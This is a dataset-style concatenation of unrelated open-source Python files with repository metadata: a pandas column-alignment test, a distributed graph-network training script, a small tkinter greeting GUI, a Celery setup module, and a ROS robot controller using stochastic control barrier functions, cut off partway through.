|
thibaultbl/feature_engine
|
08374227e7a88b67ee64b64f22e4f30390df9253
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
import pandas as pd
from feature_engine.sanity_check import SimilarColumns
def test_similar_columns_when_more_columns_in_train_than_test(
df_vartypes, df_na
):
# When columns are the same
train = df_na.copy()
test = df_vartypes.copy()
similar_columns = SimilarColumns()
similar_columns.fit(train)
transformed_df = similar_columns.transform(test)
expected_result = pd.DataFrame(
{
"Name": ["tom", "nick", "krish", "jack"],
"City": ["London", "Manchester", "Liverpool", "Bristol"],
"Studies": [np.nan, np.nan, np.nan, np.nan],
"Age": [20, 21, 19, 18],
"Marks": [0.9, 0.8, 0.7, 0.6],
"dob": pd.date_range("2020-02-24", periods=4, freq="T"),
}
)
pd.testing.assert_frame_equal(expected_result, transformed_df)
def test_similar_columns_when_more_columns_in_test_than_train(
df_vartypes, df_na
):
# When columns are the same
train = df_vartypes
test = df_na
similar_columns = SimilarColumns()
similar_columns.fit(train)
transformed_df = similar_columns.transform(test)
expected_result = pd.DataFrame(
{
"Name": ["tom", "nick", "krish", np.nan, "peter", np.nan, "fred", "sam"],
"City": [
"London",
"Manchester",
np.nan,
np.nan,
"London",
"London",
"Bristol",
"Manchester",
],
"Age": [20, 21, 19, np.nan, 23, 40, 41, 37],
"Marks": [0.9, 0.8, 0.7, np.nan, 0.3, np.nan, 0.8, 0.6],
"dob": pd.date_range("2020-02-24", periods=8, freq="T"),
}
)
pd.testing.assert_frame_equal(expected_result, transformed_df)
| 27.044776
| 85
| 0.557395
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 308
| 0.169978
|
425fb9945bfce39ef08339e9cffda8aa831a4e3d
| 6,780
|
py
|
Python
|
examples/sem_seg_dense/train.py
|
megaelius/deep_gcns_torch
|
5d565a02020ff9faff3a34d55f278e7328c73ec2
|
[
"MIT"
] | null | null | null |
examples/sem_seg_dense/train.py
|
megaelius/deep_gcns_torch
|
5d565a02020ff9faff3a34d55f278e7328c73ec2
|
[
"MIT"
] | null | null | null |
examples/sem_seg_dense/train.py
|
megaelius/deep_gcns_torch
|
5d565a02020ff9faff3a34d55f278e7328c73ec2
|
[
"MIT"
] | null | null | null |
import __init__
import os
#os.environ['LD_LIBRARY_PATH'] += ':/usr/local/cuda-11.1/bin64:/usr/local/cuda-11.2/bin64'
import numpy as np
import torch
import torch.multiprocessing as mp
import torch_geometric.datasets as GeoData
from torch_geometric.loader import DenseDataLoader
import torch_geometric.transforms as T
from torch.nn.parallel import DistributedDataParallel
from torch.utils.data.distributed import DistributedSampler
from config import OptInit
from architecture import DenseDeepGCN, CustomDenseDeepGCN
from utils.ckpt_util import load_pretrained_models, load_pretrained_optimizer, save_checkpoint
from utils.metrics import AverageMeter
import logging
from tqdm import tqdm
from parallel_wrapper import launch
import comm
from torch.utils.tensorboard import SummaryWriter
writer = SummaryWriter(log_dir='log/mlp4')
def train(model, train_loader, optimizer, criterion, opt, cur_rank):
opt.losses.reset()
model.train()
with tqdm(train_loader) as tqdm_loader:
for i, data in enumerate(tqdm_loader):
opt.iter += 1
desc = 'Epoch:{} Iter:{} [{}/{}] Loss:{Losses.avg: .4f}'\
.format(opt.epoch, opt.iter, i + 1, len(train_loader), Losses=opt.losses)
tqdm_loader.set_description(desc)
inputs = torch.cat((data.pos.transpose(2, 1).unsqueeze(3), data.x.transpose(2, 1).unsqueeze(3)), 1)
gt = data.y.to(opt.device)
# ------------------ zero, output, loss
optimizer.zero_grad()
out = model(inputs)
loss = criterion(out, gt)
# ------------------ optimization
loss.backward()
optimizer.step()
opt.losses.update(loss.item())
def test(model, loader, opt, cur_rank):
Is = np.empty((len(loader), opt.n_classes))
Us = np.empty((len(loader), opt.n_classes))
model.eval()
with torch.no_grad():
for i, data in enumerate(tqdm(loader)):
inputs = torch.cat((data.pos.transpose(2, 1).unsqueeze(3), data.x.transpose(2, 1).unsqueeze(3)), 1)
gt = data.y
out = model(inputs)
pred = out.max(dim=1)[1]
pred_np = pred.cpu().numpy()
target_np = gt.cpu().numpy()
for cl in range(opt.n_classes):
cur_gt_mask = (target_np == cl)
cur_pred_mask = (pred_np == cl)
I = np.sum(np.logical_and(cur_pred_mask, cur_gt_mask), dtype=np.float32)
U = np.sum(np.logical_or(cur_pred_mask, cur_gt_mask), dtype=np.float32)
Is[i, cl] = I
Us[i, cl] = U
ious = np.divide(np.sum(Is, 0), np.sum(Us, 0))
ious[np.isnan(ious)] = 1
iou = np.mean(ious)
if opt.phase == 'test':
for cl in range(opt.n_classes):
logging.info("===> mIOU for class {}: {}".format(cl, ious[cl]))
opt.test_value = iou
logging.info('TEST Epoch: [{}]\t mIoU: {:.4f}\t'.format(opt.epoch, opt.test_value))
def epochs(opt):
logging.info('===> Creating dataloader ...')
train_dataset = GeoData.S3DIS(opt.data_dir, opt.area, True, pre_transform=T.NormalizeScale())
train_sampler = DistributedSampler(train_dataset, shuffle=True, seed=opt.seed)
train_loader = DenseDataLoader(train_dataset, batch_size=opt.batch_size, shuffle=False, sampler = train_sampler, num_workers=opt.n_gpus)
test_dataset = GeoData.S3DIS(opt.data_dir, opt.area, train=False, pre_transform=T.NormalizeScale())
test_sampler = DistributedSampler(test_dataset, shuffle=False, seed=opt.seed)
test_loader = DenseDataLoader(test_dataset, batch_size=opt.batch_size, shuffle=False, sampler = test_sampler, num_workers=opt.n_gpus)
opt.n_classes = train_loader.dataset.num_classes
cur_rank = comm.get_local_rank()
logging.info('===> Loading the network ...')
model = DistributedDataParallel(CustomDenseDeepGCN(opt).to(cur_rank),device_ids=[cur_rank], output_device=cur_rank,broadcast_buffers=False).to(cur_rank)
logging.info('===> loading pre-trained ...')
model, opt.best_value, opt.epoch = load_pretrained_models(model, opt.pretrained_model, opt.phase)
logging.info(model)
logging.info('===> Init the optimizer ...')
criterion = torch.nn.CrossEntropyLoss().to(cur_rank)
optimizer = torch.optim.Adam(model.parameters(), lr=opt.lr)
scheduler = torch.optim.lr_scheduler.StepLR(optimizer, opt.lr_adjust_freq, opt.lr_decay_rate)
optimizer, scheduler, opt.lr = load_pretrained_optimizer(opt.pretrained_model, optimizer, scheduler, opt.lr)
logging.info('===> Init Metric ...')
opt.losses = AverageMeter()
opt.test_value = 0.
logging.info('===> start training ...')
for _ in range(opt.epoch, opt.total_epochs):
opt.epoch += 1
train_sampler.set_epoch(opt.epoch)
test_sampler.set_epoch(opt.epoch)
logging.info('Epoch:{}'.format(opt.epoch))
train(model, train_loader, optimizer, criterion, opt, cur_rank)
if opt.epoch % opt.eval_freq == 0 and opt.eval_freq != -1:
test(model, test_loader, opt, cur_rank)
scheduler.step()
if comm.is_main_process():
# ------------------ save checkpoints
# min or max. based on the metrics
is_best = (opt.test_value < opt.best_value)
opt.best_value = max(opt.test_value, opt.best_value)
model_cpu = {k: v.cpu() for k, v in model.state_dict().items()}
save_checkpoint({
'epoch': opt.epoch,
'state_dict': model_cpu,
'optimizer_state_dict': optimizer.state_dict(),
'scheduler_state_dict': scheduler.state_dict(),
'best_value': opt.best_value,
}, is_best, opt.ckpt_dir, opt.exp_name)
# ------------------ tensorboard log
info = {
'loss': opt.losses.avg,
'test_value': opt.test_value,
'lr': scheduler.get_lr()[0]
}
writer.add_scalar('Train Loss', info['loss'], opt.epoch)
writer.add_scalar('Test IOU', info['test_value'], opt.epoch)
writer.add_scalar('lr', info['lr'], opt.epoch)
logging.info('Saving the final model.Finish!')
def hola():
print('Hola')
def main():
opt = OptInit().get_args()
'''
This wrapper taken from detectron2 (https://github.com/facebookresearch/detectron2/blob/main/detectron2/engine/launch.py),
creates n_gpus processes and launches epochs function on each of them.
'''
launch(
epochs,
num_gpus_per_machine=opt.n_gpus,
num_machines=1,
machine_rank=0,
dist_url='auto',
args=(opt,)
)
#epochs(opt)
if __name__ == '__main__':
main()
| 39.649123
| 156
| 0.633333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,001
| 0.14764
|
426012a76defd0d35b2275dd689a17428018f29c
| 707
|
py
|
Python
|
sources/tkinter/prog03.py
|
kantel/pythoncuriosa
|
4dfb92b443cbe0acf8d8efa5c54efbf13e834620
|
[
"MIT"
] | null | null | null |
sources/tkinter/prog03.py
|
kantel/pythoncuriosa
|
4dfb92b443cbe0acf8d8efa5c54efbf13e834620
|
[
"MIT"
] | null | null | null |
sources/tkinter/prog03.py
|
kantel/pythoncuriosa
|
4dfb92b443cbe0acf8d8efa5c54efbf13e834620
|
[
"MIT"
] | null | null | null |
import tkinter as tk
from tkinter import ttk
win = tk.Tk()
win.title("Python GUI")
win.resizable(False, False)
win.configure(background = "grey94")
a_label = ttk.Label(win, text = "Gib Deinen Namen ein:")
a_label.grid(column = 0, row = 0)
a_label.grid_configure(padx = 8, pady = 8)
def clickMe():
action.configure(text = "Hallöchen " + name.get())
name = tk.StringVar()
name_entered = ttk.Entry(win, width = 12, textvariable = name)
name_entered.grid(column = 0, row = 1)
name_entered.grid_configure(padx = 8, pady = 8)
name_entered.focus()
action = ttk.Button(win, text = "Drück mich!", command = clickMe)
action.grid(column = 1, row = 1)
action.grid_configure(padx = 8, pady = 8)
win.mainloop()
| 26.185185
| 65
| 0.701556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 70
| 0.098731
|
4260837af4a64a8bea9204399d75709291c91101
| 528
|
py
|
Python
|
openarticlegauge/slavedriver.py
|
CottageLabs/OpenArticleGauge
|
58d29b4209a7b59041d61326ffe1cf03f98f3cff
|
[
"BSD-3-Clause"
] | 1
|
2016-04-07T18:29:27.000Z
|
2016-04-07T18:29:27.000Z
|
openarticlegauge/slavedriver.py
|
CottageLabs/OpenArticleGauge
|
58d29b4209a7b59041d61326ffe1cf03f98f3cff
|
[
"BSD-3-Clause"
] | 11
|
2015-01-06T15:53:09.000Z
|
2022-03-01T01:46:14.000Z
|
openarticlegauge/slavedriver.py
|
CottageLabs/OpenArticleGauge
|
58d29b4209a7b59041d61326ffe1cf03f98f3cff
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Initialise the Celery instance to be used by the application
This is largely just boiler plate, and we could probably look at coming back to it and cleaning it
up a bit in the future.
"""
from __future__ import absolute_import
from celery import Celery
celery = Celery()
from openarticlegauge import celeryconfig
celery.config_from_object(celeryconfig)
# Optional configuration, see the application user guide.
celery.conf.update(
CELERY_TASK_RESULT_EXPIRES=3600,
)
if __name__ == '__main__':
celery.start()
| 21.12
| 98
| 0.780303
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 260
| 0.492424
|
42629d99092a4d568c978d01f8d8dafafec338c9
| 28,061
|
py
|
Python
|
cbf_ros/scripts/cbf_controller_sy.py
|
k1majd/CBF_TB_RRT
|
2632357d42155de6dec5802c337a5abfdc824aac
|
[
"MIT"
] | 2
|
2021-10-07T17:06:57.000Z
|
2021-11-23T15:58:14.000Z
|
cbf_ros/scripts/cbf_controller_sy.py
|
k1majd/CBF_TB_RRT
|
2632357d42155de6dec5802c337a5abfdc824aac
|
[
"MIT"
] | 1
|
2021-10-13T17:18:32.000Z
|
2021-10-13T17:37:26.000Z
|
cbf_ros/scripts/cbf_controller_sy.py
|
k1majd/CBF_TB_RRT
|
2632357d42155de6dec5802c337a5abfdc824aac
|
[
"MIT"
] | 1
|
2021-11-30T11:09:43.000Z
|
2021-11-30T11:09:43.000Z
|
#! /usr/bin/env python
# call roscore
# $ roscore
#
# If start in manual
# $ rosrun cbf_ros cbf_controller.py
import rospy
import sys
import argparse
import re
import numpy as np
from scipy.integrate import odeint
from sympy import symbols, Matrix, sin, cos, lambdify, exp, sqrt, log
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import cvxopt as cvxopt
# ROS msg
from geometry_msgs.msg import Twist
from geometry_msgs.msg import PoseStamped
from geometry_msgs.msg import Vector3
from nav_msgs.msg import Odometry
from gazebo_msgs.msg import ModelState
from gazebo_msgs.srv import GetWorldProperties, GetModelState, GetModelStateRequest
# ROS others
import tf
DEBUG = False
def orientation2angular(orientation):
quaternion = ( orientation.x,
orientation.y,
orientation.z,
orientation.w)
euler = tf.transformations.euler_from_quaternion(quaternion)
angular = Vector3(
euler[0],
euler[1],
euler[2]
)
return angular
def cvxopt_solve_qp(P, q, G=None, h=None, A=None, b=None):
P = .5 * (P + P.T) # make sure P is symmetric
args = [cvxopt.matrix(P), cvxopt.matrix(q)]
if G is not None:
args.extend([cvxopt.matrix(G), cvxopt.matrix(h)])
if A is not None:
args.extend([cvxopt.matrix(A), cvxopt.matrix(b)])
cvxopt.solvers.options['show_progress'] = False
cvxopt.solvers.options['maxiters'] = 100
sol = cvxopt.solvers.qp(*args)
if 'optimal' not in sol['status']:
return None
return np.array(sol['x']).reshape((P.shape[1],))
def plottrajs(trajs):
if plotanimation:
for j in range(len(trajs.hsr)):
plt.axis([-10,10,-10,10],color ="black")
plt.plot([-1.4,-1.4],[-7,7],color ="black")
plt.plot([1.3,1.3],[-7,-1.5],color ="black")
plt.plot([1.3,1.3],[1.4,7],color ="black")
plt.plot([1.3,7],[1.4,1.4],color ="black")
plt.plot([1.3,7],[-1.5,-1.5],color ="black")
plt.plot(trajs.hsr[j][1],-trajs.hsr[j][0],color ="green",marker = 'o')
plt.arrow(float(trajs.hsr[j][1]),float(-trajs.hsr[j][0]), float(2*trajs.commands[j][0]*sin(trajs.hsr[j][2])), float(-2*trajs.commands[j][0]*cos(trajs.hsr[j][2])), width = 0.05)
for k in range(len(trajs.actors[j])):
plt.plot(trajs.actors[j][k][1],-trajs.actors[j][k][0],color ="red",marker = 'o')
plt.draw()
plt.pause(np.finfo(float).eps)
plt.clf()
plt.ion()
plt.axis([-10,10,-10,10],color ="black")
plt.plot([-1.4,-1.4],[-7,7],color ="black")
plt.plot([1.3,1.3],[-7,-1.5],color ="black")
plt.plot([1.3,1.3],[1.4,7],color ="black")
plt.plot([1.3,7],[1.4,1.4],color ="black")
plt.plot([1.3,7],[-1.5,-1.5],color ="black")
for j in range(len(trajs.hsr)):
plt.axis([-10,10,-10,10])
plt.plot(trajs.hsr[j][1],-trajs.hsr[j][0],color ="green",marker = 'o',markersize=2)
for k in range(len(trajs.actors[j])):
plt.plot(trajs.actors[j][k][1],-trajs.actors[j][k][0],color ="red",marker = 'o',markersize=2)
plt.draw()
plt.pause(np.finfo(float).eps)
plt.ioff()
fig, axs = plt.subplots(4)
axs[0].set(ylabel = 'velocity input')
# axs[1].set_title('risk')
# axs[2].set_title('min Dist')
axs[1].set(ylabel = 'angular velocity input')
axs[2].set(ylabel = 'risk')
axs[3].set(xlabel = 'time', ylabel = 'min Dist')
for k in range(len(trajs.time)):
axs[0].plot(trajs.time[k], trajs.commands[k][0],color ="green",marker = 'o',markersize=2)
axs[1].plot(trajs.time[k], trajs.commands[k][1],color ="green",marker = 'o',markersize=2)
if trajs.risk[k]<risk:
axs[2].plot(trajs.time[k], trajs.risk[k],color ="green",marker = 'o',markersize=2)
else:
axs[2].plot(trajs.time[k], trajs.risk[k],color ="red",marker = 'o',markersize=2)
axs[3].plot(trajs.time[k], trajs.minDist[k],color ="green",marker = 'o',markersize=2)
plt.draw()
plt.pause(60)
1
# plt.ioff()
# plt.figure(3)
# for k in range(len(trajs.time)):
# plt.plot(trajs.time[k], trajs.risk[k],color ="green",marker = 'o')
# plt.draw()
# 1
class robot(object):
def __init__(self,l):
#Symbolic Variables
# t = symbols('t')
# when robot is bicycle model [x,y,theta], obstacles are linear models [x,y]:
xr1,xr2,xr3,xo1,xo2 = symbols('xr1 xr2 xr3 xo1 xo2')
# v w inputs of robot:
u1,u2 = symbols('u1,u2')
vx,vy = symbols('vx,vy')
# Vector of states and inputs:
self.x_r_s = Matrix([xr1,xr2,xr3])
self.x_o_s = Matrix([xo1,xo2])
self.u_s = Matrix([u1,u2])
self.u_o = Matrix([vx,vy])
self.f = Matrix([0,0,0])
self.g = Matrix([[cos(self.x_r_s[2]), -l*sin(self.x_r_s[2])], [sin(self.x_r_s[2]), l*cos(self.x_r_s[2])], [0, 1]])
self.f_r = self.f+self.g*self.u_s
self.l = l #approximation parameter for bicycle model
self.Real_x_r = lambdify([self.x_r_s], self.x_r_s-Matrix([l*cos(self.x_r_s[2]), l*sin(self.x_r_s[2]), 0]))
# Obstacle SDE, not needed if we want to use Keyvan prediction method
self.f_o = self.u_o
# self.f_o = Matrix([0.1, 0.1])
self.g_o = Matrix([0.1, 0.1])
self.g_o = 0.1*self.u_o
# self.f_o_fun = lambdify([self.x_o_s], self.f_o)
# self.g_o_fun = lambdify([self.x_o_s], self.g_o)
def GoalFuncs(self,GoalCenter,rGoal):
Gset = (self.x_r_s[0]-GoalCenter[0])**2+(self.x_r_s[1]-GoalCenter[1])**2-rGoal
GoalInfo = type('', (), {})()
GoalInfo.set = lambdify([self.x_r_s],Gset)
GoalInfo.Lyap = lambdify([self.x_r_s,self.u_s],Gset.diff(self.x_r_s).T*self.f_r)
return GoalInfo
def UnsafeFuncs(self,gamma,UnsafeRadius): #based on the SDE formulation, needs slight change for regular BF
UnsafeInfo = type('', (), {})()
Uset = (self.x_r_s[0]-self.x_o_s[0])**2+(self.x_r_s[1]-self.x_o_s[1])**2-(UnsafeRadius+self.l)**2
CBF = exp(-gamma*Uset)
CBF_d = CBF.diff(Matrix([self.x_r_s,self.x_o_s]))
CBF_d2 = CBF.diff(self.x_o_s,2)
UnsafeInfo.set = lambdify([self.x_r_s,self.x_o_s], Uset)
UnsafeInfo.CBF = lambdify([self.x_r_s,self.x_o_s], CBF)
UnsafeInfo.ConstCond = lambdify([self.x_r_s,self.x_o_s,self.u_o] , CBF_d.T*Matrix([self.f,self.f_o])+0.5*(self.g_o.T*Matrix([[Matrix(CBF_d2[0,0]),Matrix(CBF_d2[1,0])]])*self.g_o))
UnsafeInfo.multCond = lambdify([self.x_r_s,self.x_o_s,self.u_s], CBF_d.T*Matrix([self.g*self.u_s, Matrix(np.zeros((len(self.x_o_s),1)))]))
return UnsafeInfo
def MapFuncs(self,env_bounds):
MapInfo = type('', (), {})()
MapInfo.set = []
MapInfo.CBF = []
MapInfo.setDer = []
# x_min = getattr(env_bounds, "x_min", undefined)
# x_max = getattr(env_bounds, "x_max", undefined)
# y_min = getattr(env_bounds, "y_min", undefined)
# y_max = getattr(env_bounds, "y_max", undefined)
if hasattr(env_bounds,'x_min'):
Uset = (-self.x_r_s[0]+env_bounds.x_min)
CBF = exp(gamma*Uset)
MapInfo.set.append(lambdify([self.x_r_s], Uset))
MapInfo.CBF.append(lambdify([self.x_r_s],CBF))
MapInfo.setDer.append(lambdify([self.x_r_s,self.u_s] , CBF.diff(self.x_r_s).T*self.f_r))
if hasattr(env_bounds,'x_max'):
Uset = (self.x_r_s[0]-env_bounds.x_max)
CBF = exp(gamma*Uset)
MapInfo.set.append(lambdify([self.x_r_s], Uset))
MapInfo.CBF.append(lambdify([self.x_r_s],CBF))
MapInfo.setDer.append(lambdify([self.x_r_s,self.u_s] , CBF.diff(self.x_r_s).T*self.f_r))
if hasattr(env_bounds,'y_min'):
Uset = (-self.x_r_s[1]+env_bounds.y_min)
CBF = exp(gamma*Uset)
MapInfo.set.append(lambdify([self.x_r_s], Uset))
MapInfo.CBF.append(lambdify([self.x_r_s],CBF))
MapInfo.setDer.append(lambdify([self.x_r_s,self.u_s] , CBF.diff(self.x_r_s).T*self.f_r))
if hasattr(env_bounds,'y_max'):
Uset = (self.x_r_s[1]-env_bounds.y_max)
CBF = exp(gamma*Uset)
MapInfo.set.append(lambdify([self.x_r_s], Uset))
MapInfo.CBF.append(lambdify([self.x_r_s],CBF))
MapInfo.setDer.append(lambdify([self.x_r_s,self.u_s] , CBF.diff(self.x_r_s).T*self.f_r))
if hasattr(env_bounds,'f'):
pass #To be filled later
return MapInfo
class CBF_CONTROLLER(object):
def __init__(self,robot,GoalInfo,UnsafeInfo,MapInfo):
# publisher to send vw order to HSR
self.vw_publisher = rospy.Publisher('/hsrb/command_velocity', Twist, queue_size=10)
# subscriber for Gazebo info.
rospy.wait_for_service ('/gazebo/get_model_state')
self.get_model_pro = rospy.ServiceProxy('/gazebo/get_world_properties', GetWorldProperties)
self.get_model_srv = rospy.ServiceProxy('/gazebo/get_model_state', GetModelState)
self.tOdometry_subscriber = rospy.Subscriber('/hsrb/odom_ground_truth', Odometry, self.tOdometry_callback, queue_size=10)
self.tOdometry = Odometry()
self.odometry_subscriber = rospy.Subscriber('/global_pose', PoseStamped, self.odometry_callback, queue_size=10)
self.poseStamped = PoseStamped()
# listener of tf.
self.tfListener = tf.TransformListener()
self.actors = []
trajs = type('', (), {})()
trajs.hsr = []
trajs.actors = []
trajs.commands = []
trajs.time = []
trajs.risk = []
trajs.minDist = []
self.trajs = trajs
self.robot = robot
self.GoalInfo = GoalInfo
self.UnsafeInfo = UnsafeInfo
self.MapInfo = MapInfo
self.flag = 0
self.count = 0 # num of times control_callback is called
def __del__(self):
pass
def tOdometry_callback(self, odometry):
self.odometry = odometry # this odometry's coodination is \map
def odometry_callback(self, poseStamped):
self.poseStamped = poseStamped
def gazebo_pos_transformPose(self, frame_id, gazebo_pose):
gazebo_pose_temp = PoseStamped()
gazebo_pose_temp.header = gazebo_pose.header
gazebo_pose_temp.header.frame_id = 'map'
gazebo_pose_temp.pose = gazebo_pose.pose
while not rospy.is_shutdown():
try:
gazebo_pos_trans = self.tfListener.transformPose(frame_id, gazebo_pose_temp)
break
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
continue
return gazebo_pos_trans
def controller_loop_callback(self, event):
# this controller loop call back.
self.count += 1
now = rospy.get_rostime()
self.trajs.time.append(now.secs+now.nsecs*pow(10,-9))
if DEBUG:
rospy.loginfo('Current time %i %i', now.secs, now.nsecs)
rospy.loginfo('tOdometry\n %s', self.odometry)
# get human model state from Gazebo
if self.count==1:
model_properties = self.get_model_pro()
for model_name in model_properties.model_names:
if re.search('actor*', model_name) and not model_name in self.actors: # if the model name is actor*, it will catch them.
self.actors.append(model_name)
actors_data = []
for actor in self.actors:
model_actor = GetModelStateRequest()
model_actor.model_name = actor
model_actor = self.get_model_srv(model_actor) # the pose date is based on /map
# actor_base_footprint_pose = self.gazebo_pos_transformPose('base_footprint', model_actor) # trasfer /map->/base_footprint
angular = orientation2angular(model_actor.pose.orientation) # transfer orientaton(quaternion)->agular(euler)
p = model_actor.pose.position
actors_data.append([p.x,p.y, angular.z])
if DEBUG:
rospy.loginfo('%s in timestamp:\n%s', actor, model_actor.header.stamp) # time stamp is here.
rospy.loginfo('%s in base_footprint\nposition:\n%s\nangular:\n%s', actor, actor_base_footprint_pose.pose.position, angular)
self.trajs.actors.append(actors_data)
# get hsr model state from odometry
model_hsr = self.odometry
p = model_hsr.pose.pose.position
angular = orientation2angular(model_hsr.pose.pose.orientation) # transfer orientaton(quaternion)->agular(euler)
x_r = [p.x,p.y,angular.z]
self.trajs.hsr.append(x_r)
# making vw data and publish it.
vel_msg = Twist()
# Compute controller
if abs(p.x)<1.5 and self.flag == 0:
self.flag = 1
env_bounds = type('', (), {})()
env_bounds.x_max = 1.2
env_bounds.x_min = -1.3
self.MapInfo = self.robot.MapFuncs(env_bounds)
GoalCenter = np.array([0, 5.5])
self.GoalInfo = self.robot.GoalFuncs(GoalCenter,rGoal)
u = self.cbf_controller_compute()
vel_msg.linear.x = u[0]
vel_msg.angular.z = u[1]
self.vw_publisher.publish(vel_msg)
self.trajs.commands.append([u[0],u[1]])
if self.count > 1000:
rospy.loginfo('reach counter!!')
rospy.signal_shutdown('reach counter')
elif self.GoalInfo.set(x_r)<0:
rospy.loginfo('reached Goal set!!')
rospy.signal_shutdown('reached Goal set')
def cbf_controller_compute(self):
x_r = np.array(self.trajs.hsr[len(self.trajs.hsr)-1])
x_o = np.array(self.trajs.actors[len(self.trajs.actors)-1])
u_s = self.robot.u_s
if self.count>3:
x_o_pre = np.array(self.trajs.actors[len(self.trajs.actors)-4])
# x_o_2pre = np.array(self.trajs.actors[len(self.trajs.actors)-3])
dt = self.trajs.time[len(self.trajs.time)-1]-self.trajs.time[len(self.trajs.time)-4]
u_o = (x_o[:,0:2]-x_o_pre[:,0:2])/dt
else:
u_o = np.zeros((len(x_o),len(self.robot.u_o)))
Unsafe = self.UnsafeInfo
Goal = self.GoalInfo
Map = self.MapInfo
UnsafeList = []
Dists = np.zeros((len(x_o)))
for j in range(len(x_o)):
Dists[j] = Unsafe.set(x_r, x_o[j][0:2])
if Dists[j]<UnsafeInclude:
UnsafeList.append(j)
ai = 1
if min(Dists)<0:
InUnsafe = 1
else:
InUnsafe = 0
minDist = min(Dists)
minJ = np.where(Dists == minDist)
if findBestCommandAnyway:
#Ax<=b, x = [v, w , b1,bh1 b2, bh2..., bn, b'1, b'2,b'm, delta ]
# where b is constant in Eq (14) of paper "Risk-bounded Control using Stochastic Barrier Functions"
#b' is the slack variable for map constraints
# delta is for lyapunov function
A = np.zeros((2*len(UnsafeList)+2*len(u_s)+len(Map.set)+2,len(u_s)+2*len(UnsafeList)+len(Map.set)+1))
b =np.zeros((2*len(u_s)+2*len(UnsafeList)+len(Map.set)+2))
for j in range(len(UnsafeList)):
# CBF Constraints
A[2*j,np.append(np.arange(len(u_s)),[len(u_s)+2*j])] = [Unsafe.multCond(x_r, x_o[UnsafeList[j]][0:2],[1, 0]), Unsafe.multCond(x_r,x_o[UnsafeList[j]][0:2],[0, 1]), -1] # multiplier of u , bi
b[2*j] = -ai* Unsafe.CBF(x_r, x_o[UnsafeList[j]][0:2])- Unsafe.ConstCond(x_r, x_o[UnsafeList[j]][0:2],u_o[UnsafeList[j]])
# Constraints on bi to satisfy pi risk
A[2*j+1,len(u_s)+2*j] = 1; A[2*j+1,len(u_s)+2*j+1] = -1
if Unsafe.CBF(x_r, x_o[UnsafeList[j]][0:2])<1:
b[2*j+1] = min(ai, -1/T*log((1-risk)/(1-Unsafe.CBF(x_r, x_o[UnsafeList[j]][0:2]))))
else:
b[2*j+1] = 0
# Adding U constraint
A[2*len(UnsafeList),0] = 1; b[2*len(UnsafeList)] = U[0,1]
A[2*len(UnsafeList)+1,0] = -1; b[2*len(UnsafeList)+1] = -U[0,0]
A[2*len(UnsafeList)+2,1] = 1; b[2*len(UnsafeList)+2] = U[1,1]
A[2*len(UnsafeList)+3,1] = -1; b[2*len(UnsafeList)+3] = -U[1,0]
# Adding map constraints
for j in range(len(Map.set)):
A[2*len(UnsafeList)+2*len(u_s)+j,np.append(np.arange(len(u_s)),[len(u_s)+2*len(UnsafeList)+j])] = [Map.setDer[j](x_r,[1, 0]), Map.setDer[j](x_r,[0, 1]), -1]
b[2*len(UnsafeList)+2*len(u_s)+j] = -Map.CBF[j](x_r)
# Adding Goal based Lyapunov !!!!!!!!!!!!!!!!! Needs to be changed for a different example
A[2*len(UnsafeList)+2*len(u_s)+len(Map.set),0:2] = [Goal.Lyap(x_r,[1,0]), Goal.Lyap(x_r,[0, 1])]
A[2*len(UnsafeList)+2*len(u_s)+len(Map.set),-1] = -1
b[2*len(UnsafeList)+2*len(u_s)+len(Map.set)] = 0
A[2*len(UnsafeList)+2*len(u_s)+len(Map.set)+1,-1] = 1
b[2*len(UnsafeList)+2*len(u_s)+len(Map.set)+1] = np.finfo(float).eps+1
H = np.zeros((len(u_s)+2*len(UnsafeList)+len(Map.set)+1,len(u_s)+2*len(UnsafeList)+len(Map.set)+1))
H[0,0] = 0
H[1,1] = 0
ff = np.zeros((len(u_s)+2*len(UnsafeList)+len(Map.set)+1,1))
for j in range(len(UnsafeList)):
ff[len(u_s)+2*j] = 65
H[len(u_s)+2*j+1,len(u_s)+2*j+1] = 10000
# ff[len(u_s)+2*j+1] = 50* Unsafe.CBF(x_r, x_o[minJ[0][0]][0:2])
ff[len(u_s)+2*len(UnsafeList):len(u_s)+2*len(UnsafeList)+len(Map.set)] = 20
ff[-1] = np.ceil(self.count/100.0)
else:
#Ax<=b, x = [v, w , b1, b2,..., bn, b'1, b'2,b'm, delta ]
# where b is constant in Eq (14) of paper "Risk-bounded Control using Stochastic Barrier Functions"
#b' is the slack variable for map constraints
# delta is for lyapunov function
A = np.zeros((2*len(UnsafeList)+2*len(u_s)+len(Map.set)+2,len(u_s)+len(UnsafeList)+len(Map.set)+1))
b =np.zeros((2*len(u_s)+2*len(UnsafeList)+len(Map.set)+2))
for j in range(len(UnsafeList)):
# CBF Constraints
A[2*j,np.append(np.arange(len(u_s)),[len(u_s)+j])] = [Unsafe.multCond(x_r, x_o[UnsafeList[j]][0:2],[1, 0]), Unsafe.multCond(x_r,x_o[UnsafeList[j]][0:2],[0, 1]), -1] # multiplier of u , bi
b[2*j] = -ai* Unsafe.CBF(x_r, x_o[UnsafeList[j]][0:2])- Unsafe.ConstCond(x_r, x_o[UnsafeList[j]][0:2],u_o[UnsafeList[j]])
# Constraints on bi to satisfy pi risk
A[2*j+1,len(u_s)+j] = 1
if Unsafe.CBF(x_r, x_o[UnsafeList[j]][0:2])<1:
b[2*j+1] = min(ai, -1/T*log((1-risk)/(1-Unsafe.CBF(x_r, x_o[UnsafeList[j]][0:2]))))
else:
b[2*j+1] = 0
# Adding U constraint
A[2*len(UnsafeList),0] = 1; b[2*len(UnsafeList)] = U[0,1]
A[2*len(UnsafeList)+1,0] = -1; b[2*len(UnsafeList)+1] = -U[0,0]
A[2*len(UnsafeList)+2,1] = 1; b[2*len(UnsafeList)+2] = U[1,1]
A[2*len(UnsafeList)+3,1] = -1; b[2*len(UnsafeList)+3] = -U[1,0]
# Adding map constraints
for j in range(len(Map.set)):
A[2*len(UnsafeList)+2*len(u_s)+j,np.append(np.arange(len(u_s)),[len(u_s)+len(UnsafeList)+j])] = [Map.setDer[j](x_r,[1, 0]), Map.setDer[j](x_r,[0, 1]), -1]
